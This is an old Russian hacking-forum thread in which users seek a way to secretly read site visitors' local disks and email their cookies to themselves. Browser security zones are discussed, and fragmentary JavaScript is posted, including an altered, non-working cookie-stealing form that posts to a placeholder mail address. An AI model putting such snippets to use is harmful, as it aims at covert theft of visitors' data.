Чаты Скрипт

Discussion in 'Веб-уязвимости' started by Guest, 4 Oct 2003.

  1. Guest

    Guest Guest

    Reputations:
    0
    Народ, у меня идея есть...Все знают скрипт, когда на твой сайт заходит чел, то он видит свой C: (если он не через анонимомайзер) ...Его можно дописать, что бы его диск, вносился  в лог-файл и высылался на определенный мейл...
    Я долго ломал башку, но так и не доперло...
    Подскажите
     
  2. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Так просто не получится.
    Есть такое понятие как зона безопасности.
    Твой диск находится в зоне "Мой компьютер", а страница открывается из зоны "Интернет", а доступ из документов одной зоны, к документам другой зоны запрещен.
    Так например такой код:

    <iframe id="localdisk" src="c:\temp.html"></iframe>
    < script>
    alert(localdisk.document.innerHTML)
    </script>

    работать не будет, если он размещен на инетовской страничке(зона "Интернет"). Будет выдаваться ошибка "Доступ запрещен".
    А если это фрагмент файла, открываемого со своей машины (зона "Мой компьютер"), то работать будет ))
     
  3. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Речь идет даже не о хаке, а о простом просмотре диска c...
     
  4. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    А что, "просто просмотр диска С" это не хак ?? [​IMG]
     
  5. next

    next New Member

    Joined:
    16 Aug 2003
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    скрипт < script>javascript:navigate('file:///c:/&#39[​IMG]</script> ,помещённый где то,срабатывает на машине юзера и каждый видит свой диск С:,а просмотреть чужой конечно можно,но не скриптом на веб странице,скрипт может выяснять только наличие определённых файлов,причём находящихся, как говорится по умалчиванию и не больше,а вот кто знает,как эта мулька работает?  http://www.danasoft.com/vipersig.jpg  
    да,это снифер,но через чур уж прикольный, ещё и умничает в нижней строке [​IMG] (в опере правда ошибается,хотя может в настройках оперы стоит инициировать её как MSIE...)
     
  6. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    есть такая феня:
    < script language=javascript>
    var cook=show_all_cookies();
    document.open("cookies",cook);
    document.write('<form onsubmit="javascript:window.close();"
    method=post action="mailto:ваше мыло@mail.ru"
    ENCTYPE="text/plain"><input type=hidden
    name=h1 value=',cook,'><input type=submit value="Доброго времени суток!">
    </form>&#39[​IMG];
    document.close("cookies");
    </SCRIPT>
    (скрипт в целях безопасности был немного изменён)
    НО она Изменена!!! [​IMG]
    Я не могу найти оригинал...хотя даже в книге написано именно так...вроде тут все верно, хотя реально он не пашет...(((
     
  7. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    И что это ?
    Насколько я понял это должно отсылать куки на мыло?
    Кстати в скрипте вызывается функция show_all_cookies(), но ее описания нет.
    И кстати чтение куков других сайтов не допускается системой безопасности браузера (по кр мере в IE; в опере система немного попроще..)